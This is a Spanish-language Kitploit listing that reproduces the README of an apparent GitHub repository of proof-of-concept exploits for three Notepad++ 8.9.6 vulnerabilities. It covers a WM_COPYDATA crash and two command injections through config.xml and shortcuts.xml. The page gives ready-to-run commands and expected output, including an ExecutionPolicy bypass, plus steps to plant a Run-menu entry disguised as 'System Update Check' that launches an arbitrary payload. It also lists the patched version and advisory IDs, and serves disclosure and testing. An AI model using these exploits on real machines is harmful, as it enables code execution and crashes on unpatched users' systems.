Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Notepad-8.9.6-PoC — Scripts de prueba de concepto para tres vulnerabilidades en Notepad++ <= 8.9.6, parcheadas en v8.9.6.1 (2026-05-26) CVE-2026-48770 / CVE-2026-48778 / CVE-2026-48800 | Kitploit
Herramientas/GitHubGitHub/atiilla/notepad-8.9.6-poc
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de PayloadsExplotación de Binarios
GitHubatiilla/notepad-8.9.6-poc

Notepad-8.9.6-PoC

Scripts de prueba de concepto para tres vulnerabilidades en Notepad++ <= 8.9.6, parcheadas en v8.9.6.1 (2026-05-26) CVE-2026-48770 / CVE-2026-48778 / CVE-2026-48800

Ver Repositorio
63hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoCs de Notepad++

CVE-2026-48770 / CVE-2026-48778 / CVE-2026-48800

Scripts de prueba de concepto para tres vulnerabilidades en Notepad++ <= 8.9.6, corregidas en v8.9.6.1 (2026-05-26).

Demostración CVE-2026-48778 - Archivo → Abrir carpeta contenedora → cmd desencadena RCE


Vulnerabilidades

CVETipoCVSSImpacto
CVE-2026-48770Lectura fuera de límites mediante WM_COPYDATA5.0DoS / Caída
CVE-2026-48778Inyección de comandos del SO vía config.xml7.8RCE
CVE-2026-48800Inyección de comandos del SO vía shortcuts.xml7.8RCE

Requisitos

  • Windows 10/11 (se recomienda máquina virtual)
  • Notepad++ <= 8.9.6 instalado y sin actualizar
  • Python 3.x (para scripts .py)
  • PowerShell (integrado, para .ps1)

Estructura de archivos

root@kitploit:~
.
├── README.md
├── poc_CVE-2026-48770.py                    # Caída por lectura fuera de límites (ctypes)
├── poc_CVE-2026-48778.py                    # RCE vía config.xml
├── poc_CVE-2026-48800.py                    # RCE vía shortcuts.xml
└── payloads/
    ├── config.xml                           # Payload directo (CVE-2026-48778)
    ├── shortcuts.xml                        # Payload directo (CVE-2026-48800)
    └── poc_CVE-2026-48770.ps1               # Caída por lectura fuera de límites (PowerShell)

CVE-2026-48770 - Lectura fuera de límites mediante WM_COPYDATA

Un proceso local en la misma sesión de Windows envía un mensaje WM_COPYDATA manipulado (dwData=3) sin terminador NUL. El manejador lee más allá del límite del búfer, produciendo una violación de acceso (0xc0000005) que provoca la caída de Notepad++.

Disparador: Notepad++ debe estar abierto.

PowerShell:

root@kitploit:~
# From payloads\
powershell -ExecutionPolicy Bypass -File poc_CVE-2026-48770.ps1

Python:

root@kitploit:~
python poc_CVE-2026-48770.py

Salida esperada:

root@kitploit:~
[+] Found Notepad++ HWND: 0x000A08B4
[*] Sending malformed WM_COPYDATA (dwData=3, cbData=8192, no NUL terminator)...
[+] SendMessageTimeout returned 0 - Notepad++ likely crashed (OOB read -> 0xc0000005)

La ventana de Notepad++ desaparece. Es posible que se active WER (Informe de errores de Windows).


CVE-2026-48778 - RCE vía config.xml

%APPDATA%\Notepad++\config.xml se lee al inicio. El valor de <GUIConfig name="commandLineInterpreter"> se pasa directamente a ShellExecute() sin validación. Reemplazarlo por cualquier ejecutable consigue RCE cuando el usuario hace clic en Archivo → Abrir carpeta contenedora → cmd.

Método A - Script de Python (recomendado)

root@kitploit:~
# Inject (backs up original automatically)
python poc_CVE-2026-48778.py --mode direct --payload calc.exe

# Trigger: open Notepad++ -> File -> Open Containing Folder -> cmd
# calc.exe launches instead of cmd.exe

# Restore
python poc_CVE-2026-48778.py --mode direct --restore

Método B - Colocar archivo XML

root@kitploit:~
copy payloads\config.xml %APPDATA%\Notepad++\config.xml
# Open Notepad++ -> File -> Open Containing Folder -> cmd

Método C - settingsDir (sin escritura en AppData)

root@kitploit:~
python poc_CVE-2026-48778.py --mode settingsdir --payload calc.exe
# Prints the notepad++.exe -settingsDir= launch command
# Trigger: File -> Open Containing Folder -> cmd

CVE-2026-48800 - RCE vía shortcuts.xml

%APPDATA%\Notepad++\shortcuts.xml se lee al inicio. Las entradas <Command> dentro de <UserDefinedCommands> se añaden al menú Ejecutar y se pasan directamente a ShellExecute() sin validación. Una entrada controlada por el atacante se ejecuta al hacer clic.

Método A - Script de Python (recomendado)

root@kitploit:~
# Inject (backs up original automatically)
python poc_CVE-2026-48800.py --mode direct --payload calc.exe --name "System Update Check"

# Trigger: close and reopen Notepad++ -> Run menu -> "System Update Check"
# calc.exe launches

# Restore
python poc_CVE-2026-48800.py --mode direct --restore

Método B - Colocar archivo XML

root@kitploit:~
copy payloads\shortcuts.xml %APPDATA%\Notepad++\shortcuts.xml
# Restart Notepad++ -> Run menu -> "System Update Check"

Método C - settingsDir (sin escritura en AppData)

root@kitploit:~
python poc_CVE-2026-48800.py --mode settingsdir --payload calc.exe
# Prints the notepad++.exe -settingsDir= launch command
# Trigger: Run menu -> "System Update Check"

Mitigación

Actualice Notepad++ a v8.9.6.1 o posterior.
Descarga: https://notepad-plus-plus.org/downloads/


Referencias de avisos

CVEAviso
CVE-2026-48770GHSA-r39g-3mcw-xcg2
CVE-2026-48778GHSA-7hm3-wp5q-ccv9
CVE-2026-48800GHSA-3x3f-3j39-pj3v

Solo con fines de investigación y pruebas autorizadas.

Descargar herramienta